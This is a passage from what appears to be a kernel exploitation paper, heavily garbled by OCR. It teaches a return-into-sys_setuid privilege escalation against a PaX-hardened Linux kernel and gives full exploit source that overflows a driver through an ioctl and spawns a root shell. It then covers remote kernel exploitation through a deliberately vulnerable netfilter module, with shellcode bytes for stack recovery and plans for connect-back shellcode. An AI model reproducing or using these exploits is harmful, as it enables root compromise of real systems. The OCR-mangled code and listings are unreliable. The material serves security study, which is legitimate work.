call/return implementation) and Operating System (handling of credentials) 


specific. 


Moreover, it requires a precise knowledge of the .text layout of the 


running kernel, so at least a readable image (which is a default situation 


on many distros, on Solaris, and on other operating systems we checked) 
a large or controlled infoleak is necessary. 


The idea behind is not much different from the theory behind 
’ret-into-libc’ or other userland exploiting approaches that attempt to 
circumvent the non executability of heap and stack : as we know, Linux 
associates credentials to each process in term of numeric values 


< linux-2.6.15/include/linux/sched.h > 


struct task_struct { 

[ee] 

/* process credentials */ 
uid_t uid, euid, suid, fsuid; 
gid_t gid, egid, sgid, fsgid; 


Sometimes a process needs to raise (or drop, for security reasons) its 
credentials, so the kernel exports systemcalls to do that. 
One of those is sys_setuid 


< linux-2.6.15/kernel/sys.c > 


asmlinkage long sys_setuid(uid_t uid) 


{ 


int old_euid = current-—>euid; 
int old_ruid, old_suid, new_ruid, new_suid; 
int retval; 
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retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-l, 
LSM_SETID_ID); 
if (retval) 


return retval; 


old_ruid = new_ruid = current->uid; 
old_suid = current->suid; 
new_suid = old_suid; 
if (capable(CAP_SETUID)) { [1] 
if (uid != old_ruid && set_user(uid, old_euid != uid) < 0) 
return —EAGAIN; 
new_suid = uid; 
} else if ((uid != current->uid) && (uid != new_suid) ) 


return —-EPERM; 


if (old_euid != uid) 
{ 
current-—>mm->dumpable = suid_dumpable; 
smp_wmb () ; 
} 
current->fsuid = current->euid = uid; [2] 
current-—>suid = new_suid; 


key_fsuid_changed (current) ; 
proc_id_connector (current, PROC_EVENT_UID); 


return security_task_post_setuid(old_ruid, old_euid, old_suid, 
LSM_SETID_ID); 


As you can see, the ’security’ checks (out of the LSM security_* entry 
points) are performed at [1] and after those, at [2] the values of fsuid 
and euid are set equal to the value passed to the function. 


sys_setuid is a system call, so, due to systemcall convention, parameters 
are passed in register. More precisely, ’uid’ will be passed in ’%ebx’. 
The idea is so simple (and not different from ’ret-into-libc’ [19] or 
other userspace page protection evading tecniques like [20]), if we manage 


to have 0 into %ebx and to jump right in the middle of sys_setuid (and 
right after the checks) we should be able to change the ’euid’ and ’fsuid’ 
of our process and thus raise our priviledges. 


Let’s see the sys_setuid disassembly to better tune our idea 


[iene 2s] 
c0120fd0: b8 00 eO ff ff mov SOxffffe000,%eax [1] 


c0120fd5: 21 e0 and Sesp, Seax 

c0120fd7: 8b 10 mov (Seax) , sedx 

c0O120fd9: 89 9a 6c O01 O00 OD mov Sebx,0xl6c (%edx) [2] 
c0O120fdf: 89 9a 74 01 00 OOD mov Sebx,0x174 (Sedx) 
c0120fe5: 8b 00 mov (Seax) , eax 

c0120fe7: 89 bO 70 01 00 O00 mov Sesi,0x170 (Seax) 
c0120fed: 6a O1 push SOx1 

c0120fef: 8b 44 24 04 mov Ox4 (Sesp) , eax 
c01l20f£3: 50 push Seax 

cO0120ff4: 55 push Sebp 

cO1l20ff5: oH) push sedi 

c0120ff6: e8 65 ce Oc 00 call cOlede6é0 

cO120ffb: 89 c2 mov Seax, SeCdx 

c0120ffd: 83 c4 10 add $0x10,%esp [3] 
c0121000: 89 dod mov Sedx, eax 

c0121002: 5e pop sesi 

c0121003: 5b pop Sebx 

c0121004: 5e pop sesi 

c0121005: 5f£ pop sedi 

c0121006: 5d pop sebp 


6.txt Wed Apr 26 09:43:45 2017 47 
c0121007: C3: ret 


At [1] the current process task_struct is taken from the kernel stack 


value. At [2] the %Sebx value is copied over the ’euid’ and ’fsuid’ members 


of the struct. We have our return address, which is [1]. 
At that point we need to force somehow %ebx into being 0 (if we’re not 
lucky enough to have it already zero’ed). 


[To demonstrate this vulnerability we have used the local exploitable 
buffer overflow in dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl () 
command). Since it’s a stack based overflow we can chain multiple return 
address preparing a fake stack frame that we totally control. 
We need 


a zero’ed %ebx : the easiest way to achieve that is to find a pop %ebx 
followed by a ret instruction [we control the stack] 


ret-to-pop-ebx: 
[*}).6c0100ed3% 5b pop Sebx 
[*] c0100cd4: c3 ret 


we don’t strictly need pop %ebx directly followed by ret, we may find a 
sequence of pops before the ret (and, among those, our pop %Sebx). It is 


just a matter of preparing the right ZERO-layout for the pop sequence 


(to make it simple, add a ZERO 4-bytes sequence for any pop between the 


Sebx one and the ret) 


- the return addr where to jump, which is the [1] address shown above 


a ‘'ret-to-ret’ padding to take care of the stack gap created at [3] by 
the function epilogue (%esp adding and register popping) 


ret-to-ret pad: 
[*] Oxffffe413 c3 ret 


(we could have used the above ret aswell, this one is into vsyscall 
page and was used in other exploit where we didn’t need so much 
knowledge of the kernel .text.. it survived here :) ) 


-— the address of an iret instruction to return to userland (and a crafted 


stack frame for it, as we described above while discussing ’Stack 
Based’ explotation) 


ret-to-iret: 
[*] c013403f: cf iret 


Putting all together this is how our ’stack’ should look like to perform a 


correct explotation 


low addresses 


ret-to-ret pad 
ret-to-ret pad 
ret-to-pop ebx 
0x00000000 
ret-to-setuid 
ret-to-ret pad 
ret-to-ret pad 
ret-to-ret pad 
ret-to-iret 
fake-iret-—frame 


high addresses 
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Once correctly returned to userspace we have successfully modified ’ fsuid’ 
and ’euid’ value, but our /ruid’ is still the original one. At that point 
we simply re-exec ourselves to get euid=0 and then spawn the shell. 

Code follows 


< stuff/expl/grsec_noexec.c > 


nclude <sys/ioctl.h> 
nclude <signal.h> 
nclude <stdio.h> 
nclude <string.h> 
nclude <stdlib.h> 
nclude <sys/types.h> 
nclude <sys/stat.h> 
nclude <fcntl.h> 
nclude <sys/mman.h> 


Pepe pe pe pe pe pe pe pe 


include "dummy.h" 


define DEVICE "/dev/dummy" 
define NOP 0x90 

define PAGE SIZE 0x1000 
define STACK_SIZE 8192 
//#define STACK_SIZE 4096 


#define STACK _MASK ~ (STACK_SIZI 
/* patch it at runtime */ 


ea) 
| 

ran 

~ 


define ALTERNATE STACK O0x00BBBBBB 

/*2283a*/ 

define RET_INTO_RET_STR "\x3d\x28\x02\x00" 
#define DUMMY RET _INTO_RET STR 
define ZERO "\x00\x00\x00\x00" 
/* 22ad3 */ 

define RET_INTO_POP_EBX "\xd3\x2a\x02\x00" 
/* 1360 */ 

define RET_INTO_IRET "\x60\x13\x00\x00" 
/*® 227Tfc */ 

define RET_INTO_SETUID "\xfc\x27\x02\x00" 
// do_eip at .text offset (rivedere) 

// 0804864£ 


define USER_CODE_OFFSET "\x4£\x86\x04\x08" 


CC] GI 


define USER_CODE_SEGMENT "\x73\x00\x00\x00" 
define USER_EFLAGS "\x46\x02\x00\x00" 
define USER_STACK_OFFSET "\xbb\xbb\xbb\x00" 
define USER_STACK_SEGMENT "\x7b\x00\x00\x00" 


/* sys_setuid grsec kernel */ 


/* 
227EhG: 89 e2 mov Sesp, sedax 
22 ]fe: 89 f1 mov Sesi, Secx 
22800: 81 e2 00 eO ff ff and SOxffffe000, tedx 
22806: 8b 02 mov (Sedx) , seax 
22808: 89 98 50 01 00 00 mov Sebx, 0x150 (Seax) 
2280e: 89 98 58 01 00 00 mov Sebx, 0x158 (Seax) 
22814: 8b 02 mov (Sedx) , eax 
22/8216: 89 fa mov Sedi, tedx 
22818: 89 a8 54 01 00 O00 mov Sebp, 0x154 (Seax) 
2281e: c7 44 24 18 01 00 O00 movil S0Ox1,0x18 (%esp) 


22825: 00 
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22826: 8b 04 24 mov (Sesp) , seax 

22829: 5d pop Sebp 

2282a: 5b pop Sebx 

2282b: 5e pop sesi 

2282c: SE pop sedi 

2282d: 5d pop sebp 

2282e: e9 ef d5 Oc 00 jmp efe22 
<cap_task_post_setuid> 

22333: 83 ca ff or SOxffffffff, tedx 

22836: 89 dod mov Sedx, seax 

22838: 5f£ pop sedi 

22839: 5b pop Sebx 

2283a: 5e pop sesi 

2283b: 5f£ pop sedi 

2283c: 5d pop Sebp 

2283d: c3 ret 


Ay 


fo) 


/* pop %ebx, ret grsec 


ffd1la884: 5b pop Sebx 

ffd1a885: c3 ret 
wY 
char *g_prog_name; 
char kern_noexec_shellcode[] = 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_POP_EBX 
ZERO 
RET _INTO_SETUID 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_POP_EBX 
RET _INTO_RET_STR 
RET _INTO_RET_STR 
RET _INTO_IRET 
USER_CODE_OFFSET 
USER_CODE_SEGMENT 
USER_EFLAGS 
USER_STACK_OFFSET 
USER_STACK_SEGMENT 


6.txt Wed Apr 26 09:43:45 2017 50 


void re_exec(int useless) 

{ 
char *a[3] = { g_prog_name, "exec", NULL }; 
execve (g_prog_name, a, NULL); 


} 


char *allocate_jump_stack (unsigned int jump_addr, unsigned int size) 


{ 
unsigned int round_addr 
unsigned int diff 


jump_addr & OxFFFFFOOO; 
jump_addr - round_addr; 


unsigned int len = (size + diff + OxFFF) & OxFFFFFOOO; 


char *map_addr = mmap((void*) round_addr, 
len, 
PROT_READ |PROT_WRITE, 
MAP_FIXED |MAP_ANONYMOUS |MAP_PRIVATE, 
0, 
0); 


if (map_addr == (char*)-1) 
return NULL; 


memset (map_addr, 0x00, len); 


return map_addr; 


char *allocate_jump_code (unsigned int jump_addr, void* code, 
size) 
{ 

unsigned int round_addr = jump_addr & OxFFFFFOO0O; 

unsigned int diff jump_addr - round_addr; 


unsigned int 


unsigned int len = (size + diff + OxFFF) & OxFFFFFOOO; 


char *map_addr = mmap((void*) round_addr, 
len, 
PROT_READ | PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, 
0, 
0); 


if (map_addr == (char*)-1) 
return NULL; 


memset (map_addr, NOP, len); 
memcpy (map_addrt+diff, code, size); 


return map_addr + diff; 


inline void patch_code_4byte(char *code, unsigned int offset, 
value) 


*((unsigned int *) (code + offset)) = value; 


int main(int argc, char *argv[]) 
{ 

if(arge > 1) 

{ 


int ret; 
char *argvx[] = {"/bin/sh", NULL}; 
ret = setuid(0); 


printf ("euid=%d, ret=%sd\n", geteuid(), ret); 


unsigned int 
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execve ("/bin/sh", argvx, NULL); 
exit(1); 
} 


signal (SIGSEGV, re_exec); 


g_prog_name = argv[0]; 
char *stack_jump = 
allocate_jump_stack (ALTERNATE_STACK, PAGE_SIZE) ; 


if (!stack_jump) 
{ 


fprintf(stderr, "Exiting: mmap failed"); 
exit (1); 


char *memory = malloc(PAGE_SIZE), *mem_orig; 
mem_orig = memory; 


memset (memory, OxDD, PAGE_SIZE) ; 


struct device_io_ctl *ptr = (struct device_io_ct1*)memory; 

ptr->chunk_num 9 (sizeof (kern_noexec_shellcode) -1)/sizeof (struct 
device_io_blk) + 1; 

printf ("Chunk num: %d\n", ptr->chunk_num) ; 

ptr->type = OxFFFFFFFF; 


memory += (sizeof(struct device_io_ctl) + sizeof(struct device_io_blk) 
9); 


/* copy shellcode */ 
memcpy (memory, kern_noexec_shellcode, sizeof (kern_noexec_shellcode)-1); 


int i, fd = open(DEVICE, O_RDONLY); 
if(fd < 0) 
return 0; 


toctl (fd, KERN_IOCTL_STORE_CHUNK, (unsigned long)mem_orig) ; 
return 0; 


< / > 


As we said, we have chosen the PaX security patches for Linux/x86, but 
some of the theory presented equally works well in other situation. 

A slightly different exploiting approach was successfully used on 
Solaris/SPARC. (we leave it as an ’exercise’ for the reader ;)) 


Sa = [i “3922 Remote Kernel Exploiting 


Writing a working and somehow reliable remote kernel exploit is an 
exciting and interesting challenge. Keeping on with the ’style’ of this 
paper we’re going to propose here a couple of tecniques and ’life notes’ 
that leaded us into succeeding into writing an almost reliable, image 
independant and effective remot xploit. 


After the first draft of this paper, a couple of things changed, so some 
of the information presented here could be outdated in the very latest 
kernels (and compiler releases), but are anyway a good base for the 
tractation (we’ve added notes all around this chapter about changes and 
updates into the recent releases of the linux kernel). 
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A couple of the ideas presented here converged into a real remote exploit 
for the madwifi remote kernel stack buffer overflow [21], that we already 
released [22], without examining too much in detail the explotation 
approaches used. This chapter can be thus seen both as the introduction 
and the extension of that work. 

More precisely we will cover here also the exploiting issues and solution 
when dealing with code running in interrupt context, which is the most 
common running mode for network based code (interrupt handler, softirqa, 
etc) but which wasn’t the case for the madwifi exploit. 

The same ideas apply well to kernel thread context too. 


Explotation tecniques and discussion is based on stack based buffer 
overflow on the Linux 2.6.* branch of kernels on the x86 architecture, but 
can be reused in most of the conditions that lead us to take control over 
the instruction flow. 


------ [ 3.2.1 - The Network Contest 


We begin with a few considerations about the typology of kernel code that 
we'll be dealing with. Most of that code runs in interrupt context (and 
sometimes in a kernel thread context), so we have some ’limitations’ 


—- we can’t directly ’return-to-userspace’, since we don’t have a valid 
current task pointer. Moreover, most of times, we won’t control the 
address space of the userland process we talk with. Netherless we can 
relay on some ’fixed’ points, like the ELF header (given there’s no 
PIE / .text randomization on the remote box) 


—- we can’t perform any action that might make the kernel path to sleep 
(for example a memory fault access) 


—- we can’t directly call a system call 


—- we have to take in account kernel resource management, since such kind 
of kernel paths usually acquire spinlocks or disables pre-emption. We 
have to restore them in a stable state. 


Logically, since we are from remote, we don’t have any information about 
structs or kernel paths addresses, so, since a good infoleaking is usually 
a not very probable situation, we can’t rely on them. 


We have prepared a crafted example that will let us introduce all the 
tecniques involved to solve the just stated problems. We choosed to write 
a netfilter module, since quite a lot of the network kernel code depends 
on it and it’s the main framework for third part modules. 


< stuff/drivers/linux/remote/dummy_remote.c > 


define MAX_TWSKCHUNK 30 
define TWSK_PROTO 37 


struct twsk_chunk 


int type; 
char buff[12]; 
}; 


struct twsk 


{ 
int chunk_num; 
struct twsk_chunk chunk[0]; 


}; 


static int process_twsk_chunk (struct sk_buff *buff) 


{ 
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struct twsk_chunk chunks [MAX_TWSKCHUNK]; 


struct twsk *ts = (struct twsk *) ((char*)buff->nh.iph + 
(buff->nh.iph->ihl * 4)); 


if (ts->chunk_num > MAX_TWSKCHUNK) [1] 


return (NF_DROP); 


printk (KERN_INFO "Processing TWSK packet: packet frame n. %d\n", 
ts->chunk_num) ; 


memcpy (chunks, ts->chunk, sizeof(struct twsk_chunk) * ts->chunk_num); [2] 
// do somethings.. 


return (NF_ACCEPT) ; 


fo 


We have a signedness issue at [1], which triggers a later buffer overflow 
at [2], writing past the local ’chunks’ buffer. 

As we just said, we must know everything about the vulnerable function, 
that is, when it runs, under which ‘context’ it runs, what calls what, how 
would the stack look like, if there are spinlocks or other control 
management objects acquired, etc. 


A good starting point is dumping a stack trace at calling time of our 
function 


#1 Oxc02b5139 in nf_iterate (head=0xc042e4a0, skb=0xcl721ad0, hook=0, [1] 
indev=0xc1224400, outdev=0x0, i=0xc1721a88, 
okfn=0xc02bb150 <ip_rcv_finish>, hook_thresh=—2147483648) 
at net/netfilter/core.c:89 

2 Oxc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xcl721ad0, [2] 
indev=0xc1224400, outdev=0x0, okfn=0xcO2bb150 <ip_rev_finish>, 
hook_thresh=-2147483648) at net/netfilter/core.c:125 

3 Oxc0O2baee3 in ip_rcv (skb=0xclbc4a40, dev=0xc1224400, pt=0xc0399310, 
orig_dev=0xc1224400) at net/ipv4/ip_input.c:348 

4 0xc02a5432 in netif_receive_skb (skb=0xclbc4a40) at 

net/core/dev.c:1657 

5 Oxc024d3c2 in rt18139_rx (dev=0xcl1224400, tp=0xcl224660, budget=64) 
at drivers/net/8139to0o0.c:2030 

6 Oxc024d70e in rt18139_poll (dev=0xcl1224400, budget=0xc1721b78) 
at drivers/net/8139to0o0.c:2120 


7 Oxc02a5633 in net_rx_action (h=0xc0417078) at net/core/dev.c:1739 

8 Oxc0118a75 in __do_softirg () at kernel/softirg.c:95 

9 OQOxc0118aba in do_softirq () at kernel/softirg.c:129 [3] 
10 Oxc0118b7d in irq_exit () at kernel/softirg.c:169 

11 0xc0104212 in do_IRQ (regs=0xcl721lad0) at arch/i386/kernel/irg.c:110 
12 Oxc0102b0a in common_interrupt () at current.h:9 

13 0x0000110b in ?? () 


Our vulnerable function (just like any other hook) is called serially by 
the nf_iterate one [1], during the processing of a softirq [3], through 
the netfilter core interface nf_hook_slow [2]. 

It is installed in the INPUT chain and, thus, it starts processing packets 
whenever they are sent to the host box, as we see from [2] where pf = 2 
(PF_INET) and hook = 1 (NF_IP_LOCAL_IN). 


Our final goal is to execute some kind of code that will estabilish a 
connection back to us (or bind a port to a shell, or whatever kind of 
shellcoding you like more for your remote exploit). Trying to execute it 
directly from kernel land is obviously a painful idea so we need to hijack 
some userland process (remember that we are on top of a softirq, so we 
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have no clue about what’s really beneath us; it could equally be a kernel 
thread or the idle task, for example) as our victim, to inject some code 
inside and force the kernel to call it later on, when we’re out of an 
asyncronous event. 


That means that we need an intermediary step between taking the control 
over the flow at ’softirg time’ and execute from the userland process. 
But let’s go on order, first of all we need to _start executing_ at least 
the entry point of our shellcode. 


As it is nowadays used in many exploit that have to fight against address 
space randomization in the absence of infoleaks, we look for a jump to a 
jmp *Sesp or push reg/ret or call reg sequence, to start executing from a 
known point. 

To avoid guessing the right return value a nop-alike padding of 
ret-into-ret addresses can be used. But we still need to find those 
opcodes in a ’fixed’ and known place. 


The 2.6. branch of kernel introduced a fixed page [*] for the support of 
the ’sysenter’ instruction, the ’vsyscall’ one 


bfe37000-bfe4d000 rwxp bfe37000 00:00 0 [stack] 
ffffeo00-fFFLLOOO -—--p 00000000 00:00 0 [vdso] 


which is located at a fixed address : Oxffffe000 —- OxfffffO00. 
[*] At time of release this is no more true on latest kernels, since the 
address of the vsyscall page is randomized starting from the 2.6.18 


kernel. 


The ’vsyscall’ page is a godsend for our ‘entry point’ shellcode, since we 
can locate inside it the required opcodes [*] to start executing 


(gdb) x/i Oxffffe75f 


Oxffffe75f: jmp *SeESp 
(gdb) x/i Oxffffe420 
Oxffffe420: ret 


[*] After testing on a wide range of kernels/compilers the addresses of 
those opcodes we discovered that sometimes they were not in the 
expected place or, even, in one case, not present. This could be the 
only guessing part you could be facing (also due to vsyscall 
randomization, as we said in the note before), but there are 
(depending on situations) other possibilities [fixed start of the 
kernel image, fixed .text of the ’running process’ if out of interrupt 
context, etc]. 


[To better figure out how the layout of the stack should be after the 
overflow, here there’s a small schema 


JMP -N ~~ |-------4 t N is the size of the buffer plus some bytes 
(ret-to-ret chain + jmp space) 


ret-to-jmp <-+ the address of the jmp *%esp inside vsyscall 
ret-to-ret # the address of ’ret’ inide vsyscall 
ret-to-ret 


overwritten # ret-to-ret padding starting from there 
ret address 
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| 

| # shellcode is placed inside the buffer 

| because it’s huge, but it could also be 
| splitted before and after the ret addr. 
nop | 
nop 


| | 
| | 
| | 
| shellcode | 
| | 
| | 


At that point we control the flow, but we’re still inside the softirq, so 
we need to perform a couple of tasks to cleanly get our connect back 
shellcod xecuted 


—- find a way to cleanly get out from the softirg, since we trashed the 
stack 

- locate the resource management objects that have been modified (if 
the’ve been) and restore them to a safe state 

— find a place where we can store our shellcode untill later execution 
from a ’process context’ kernel path. 

—- find a way to force the before mentioned kernel path to execute our 
shellcode 


The first step is the most difficult one (and wasn’t necessary in the 
madwifi exploit, since we weren’t in interrupt context), because we’ve 
overwritten the original return pointer and we have no clue about the 
kernel text layout and addresses. 


We’re going now to present tecniques and a working shellcode for each one 
of the above points. [ Note that we have mentioned them in a ’conceptual 
order of importance’, which is different from the real order that we use 
inside the exploit. More precisely, they are almost in reverse order, 
since the last step performed by our shellcode is effectively getting out 
from the softirg. We felt that approach more well-explanatory, just 
remember that note during the following sub-chapters] 


cae eae [ 3.2.2 - Stack Frame Flow Recovery 


The goal of this tecnique is to unroll the stack, looking for some known 
pattern and trying to reconstruct a caller stack frame, register status 
and instruction pointing, just to continue over with the normal flow. 

We need to restore the stack pointer to a known and consistent state, 
restore register contents so that the function flow will exit cleanily and 
restore any lock or other syncronization object that was modified by the 
functions among the one we overflowed in and the one we want to ‘’return 
CO, 


Our stack layout (as seen from the dump pasted above) would basically be 
that one 


stack layout 


bottom of stack 


do_softirg() 


Saha Se BPE ee /* nf_hook_slow() stack frame */ 
argN 

ip_rcev arg2 

nf_hook_slow SSSSSSS>=> argl 

ip_rcev_finish ret-to-(ip_rcv()) 

nf_iterate saved regl 
saved reg2 


process_twsk_chunk 
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| | 
+ + top of stack 


As we said, we need to locate a function in the previous stack frames, not 
too far from our overflowing one, having some ’good pattern’ that would 
help us in our search. 

Our best bet, in that situation, is to check parameter passing 


#2 OxcO2b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xcl721ad0, 
indev=0xc1224400, outdev=0x0, ....) 


The ’nf_hook_slow()’ function has a good ’signature’ 


—- two consecutive dwords 0x00000002 and 0x00000002 
—- two kernel pointers (dword > 0xC0000000) 
- a following NULL dword 


We can relay on the fact that this pattern would be a constant, since 
we’re in the INPUT chain, processing incoming packets, and thus always 
having a NULL ’outdev’, pf = 2 and hook = 1. 

Parameters passing is logically not the only ’signature’ possible 
depending on situations you could find a common pattern in some local 
variable (which would b ven a better one, because we discovered that 
some versions of GCC optimize out some parameters, passing them through 
registers). 


Scanning backward the stack from the process_twsk_chunk() frame up to 

the nf_hook_slow() one, we can later set the %esp value to the place wher 
is saved the return address of nf_hook_slow(), and, once recreated th 
correct conditions, perform a ‘/ret’ that would let us exit cleanily. 

We said ’once recreated the correct conditions’ because the function could 
expect some values inside registers (that we have to set) and could expect 
some ’lock’ or ’preemption set’ different from the one we had at time of 


overflowing. Our task is thus to emulate/restore all those requirements. 


To achieve that, we can start checking how gcc restores registers during 
function epilogue 


c0O2b6b30 <nf_hook_slow>: 


c02b6b30: ois) push Sebp 

cO2b6b31: 57 push sedi 

cO2b6b32: 56 push sesi 

c02b6b33: 53 push Sebx 

eee 

cO2b6bdb: 89 d8& mov Sebx, eax 
cO2b6bdd: 5a pop Sedx ==+ 
cO02b6bde: 5b pop Sebx 

cO2b6bdE: 5e pop Sesi restore 
cO2b6be0: 5f£ pop sedi 

cO2b6bel: 5d pop sebp =+ 
cO2b6be2: c3 ret 


This kind of epilogue, which is common for non-short functions let us 
recover the state of the saved register. Once we have found the ‘ret’ 
value on the stack we can start ’rolling back’ counting how many ’pop’ are 
there inside the text to correctly restore those register. [*] 


[*] This is logically not the only possibility, one could set directly the 
values via movl, but sometimes you can’t use ‘/predefined’ values for 
those register. As a side note, some versions of the gcc compiler 
don’t use the push/pop prologue/epilogue, but translate the code as a 
sequence of movl (which need a different handling from the shellcode). 


To correctly do the ’unrolling’ (and thus locate the pop sequence), we 
need the kernel address of /nf_hook_slow()’. This one is not hard to 
calculate since we have already found on the stack its return addr (thanks 


to the signature pointed out before). Once again is the intel calling 
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procedures convention which help us 


[...] 


c02bc8bd: 6a 02 push SOx2 
cO2bc8bFf: e8 6c a2 ff ff call c02b6b30 <nf_hook_slow> 
c02bc8c4: 83 c4 lc add SOxlc, %esp 


Pace] 


That small snippet of code is taken from ip_rcev(), which is the function 
calling nf_hook_slow(). We have found on the stack the return address, 
which is Oxc02bc8c4, so calculating the nf_hook_slow address is just a 
matter of calculating the ’displacement’ used in the relative call (opcode 
Oxe8, the standard calling convention on kernel gcc-compiled code) and 
adding it to the return addr value (INTEL relative call convention adds 
the displacement to the current EIP) 


[*] call to nf_hook_slow -> Oxe8 Ox6c Ox2a Oxff Oxff 
[*] nf_hook_slow address -> Oxc0O2bc8c4 + Oxffffa26c = 0xc02b6b30 


To better understand the whole Stack Frame Flow Recovery approach here’s 
the shellcode stub doing it, with short comments 
Here we increment the stack pointer with the ’pop %Seax’ sequence and 
test for the known signature [ 0x2 0x1 X X 0x0 ]. 


loop: 

"\x58" // pop Seax 
"\x83\x3c\x24\x02" // cmpl S0x2, (esp) 
"\x75\xf9" // jne loop 
"\x83\x7c\x24\x04\x01" // cmpl SOx1,0x4 (%esp) 
"\x75\xf2" // jne loop 
"\x83\x7c\x24\x10\x00" // cmpl $0x0, 0x10 (%esp) 
"\x75\xeb" // jne loop 
"\x8d\x64\x24\xfc" // lea Oxfffffffc(Sesp),%esp 


—- get the return address, subtract 4 bytes and deference the pointer to get 
the nf_hook_slow() offset/displacement. Add it to the return address to 
obtain the nf_hook_slow() address. 


"\x8b\x04\x24" // mov (Sesp), eax 
"\x89\xc3" // mov Seax, sebx 
"\x03\x43\xfc" // add Oxfffffffc (%ebx) , eax 


—- locate the Oxc3 opcode inside nf_hook_slow(), eliminating ’spurious’ 
Oxc3 bytes. In this shellcode we do a simple check for /’/movl’ opcodes 
and that’s enough to avoid ’false positive’. With a larger shellcode 
one could write a small disassembly routine that would let perform a 
more precise locating of the ’ret’ and ’pop’ [see later]. 


increment: 

"\ x40" fi Ane Seax 

"\x8a\x18" // mov (eax), Sb1 
"\x80\xfb\xc3" // cmp S0xc3,%bl 

"\x75\xf8" // jne increment 
"\x80\x78\xff£\x88" // cmpb $Ox88, OxffffLfffLf (Seax) 
"\x74\xf2" // je increment 
"\x80\x78\xff£\x89" // cmpb S0x89, OxfffLffFfFFF (Seax) 
"\x74\xec" // je 8048351 increment 


—- roll back from the located ’ret’ up to the last pop instruction, if 
any and count the number of ‘pop’s. 


pop: 
"\x31\xc9" // xox S$ecx, SCX 
"\x4g" // dec seax 

"\x8a\x18" // mov (eax), Sb1 
"\x80\xe3\x£0" // and SOxf0, %b1 


"\x80\xfb\x50" // cmp $0x50,%b1 
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WNSTONKOS" // jne end 
"\x41" // inc SECK 
"\xeb\xf2" //  3mp pop 
"\x40" // inc S$eax 


- use the calculated byte displacement from ret to rollback %esp value 


"\x89\xc6" // mov S$eax,%esi 
"\x31\xc0" // xor Seax, eax 
"\xb0\x04" // mov S0x4,%al 
"\xf7\xel" // mul SeCxX 
WAS29\xC4" // sub Seax, esp 


- set the return value 


"\x31\xc0" // xox Seax, eax 
—- call the nf_hook_slow() function epilog 
"\xff\xe6" // jmp *Sesi 


It is now time to pass to the ’second step’, that is restore any pending 
lock or other synchronization object to a consistent state for the 
nf_hook_slow() function. 


==— | Saad Resource Restoring 


At that phase we care of restoring those resources that are necessary for 
the ‘hooked return function’ (and its callers) to cleanly get out from the 
softirg/interrupt state. 


Let’s take another (closer) look at nf_hook_slow() 


< linux-2.6.15/net/netfilter/core.c > 


int nf_hook_slow(int pf, unsigned int hook, struct sk_buff **pskb, 
truct net_device *indev, 


i 
s 
struct net_device *outdev, 
i 
i 


nt (*okfn) (struct sk_buff *), 
nt hook_thresh) 


struct list_head *elem; 
unsigned int verdict; 
int ret = 0; 


/* We may already have this, but read-locks nest anyway */ 


reu_read_lock(); [1] 
eaeeeal| 
unlock: 
rcu_read_unlock(); [2] 
return ret; Pi 
} 
Ko fe > 


At [1] '’rcu_read_lock()’ is invoked/acquired, but [2] ’rcu_read_unlock ()’ 
is never performed, since at the ’/Stack Frame Flow Recovery’ step we 
unrolled the stack and jumped back at [3]. 


'rcu_read_unlock()’ is just an alias of preempt_enable(), which, in the 
end, results in a one-decrement of the preempt_count value inside the 
thread_info struct 


6.txt Wed Apr 26 09:43: 


45 2017 59 


< linux-2.6.15/include/linux/rcupdate.h > 


define rcu_read_lock () 


-] 


define rcu_read_unlock () 


< 


Ms 


> 


< 


-] 


define inc_preempt_count () 
define dec_preempt_count () 


define preempt_count () 


ifdef CONFIG_PREEMPT 


t+ define add_preempt_count (val) 
define sub_preempt_count (val) 


preempt_disable() 


preempt_enable() 


linux-2.6.15/include/linux/preempt.h > 


do { preempt_count () 
do { preempt_count () 


add_preempt_count (1) 
sub_preempt_count (1) 


asmlinkage void preempt_schedule (void) ; 


#define \ 


do { \ 


preempt_disable() 


inc_preempt_count (); 
barrier(); \ 
} while (0) 


#defin 


nable_no_resched() 


\ 


\ 


preempt_ 
do { \ 
barrier(); \ 
dec_preempt_count (); 
} while (0) 
#define 
do { \ 
if 


} while 


#defin \ 


do { \ 


Q) 


—enabl 


preempt_check_resched () 


(unlikely (test_thread_flag (TIF_NE 
preempt_schedule(); 


\ 


\ 


RI 
\ 


\ 


pr 
barrier(); \ 
preempt_check_resched 


} while (0) 


else 


define preempt_disable() 


mpt_enable_no_resched(); 


Og \ 


while 
while 


do 
do 


defin 
defin 
define 


pr 
preempt_enable () 
preempt_check_resched 


endif 


< 


/ 


> 


mpt_enable_no_resched () 


while 
while 


do 
do 


ARAN AK 
wee a 
aR 
oe O°O Oo 
yer ry wy 


Q) 


As you can see, if CONFIG_PRE 


EMP T 


is not set, allt 


just no-ops. ‘’preempt_disable 
times (preemption will 


be disabled untill we call 


()’ is nestable, so 


same number of times). 
find a value equal or greater 
time’. 


That means that, 
inside preempt_count at 
We can’t just ignore that value or otherwise we’11l BUG() 


given a PRE 


to. * 12 


EXSCHED) ) ) 


1); 


1); 


(current_thread_info()->preempt_count) 


} while 
} while 


hose operations are 
can be cal 
‘preempt_enable()’ 
EMPT kernel, 
‘exploit 


lled multiple 


the 
we should 


later on 
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inside scheduler code (check preempt_schedule_irq() in kernel/sched.c). 


C5 


What we have to do, on a PREEMPT kernel, is thus locate /’preempt_count’ 
and decrement it, just like ’rcu_read_unlock()’ would do. 

For the x86 architecture , ‘/preempt_count’ is stored inside the ’struct 
thread_info’ 


< linux-2.6.15/include/asm-i386/thread_info.h > 


struct thread_info { 


struct task_struct *task; /* main task structure */ 

struct exec_domain *exec_domain; /* execution domain */ 

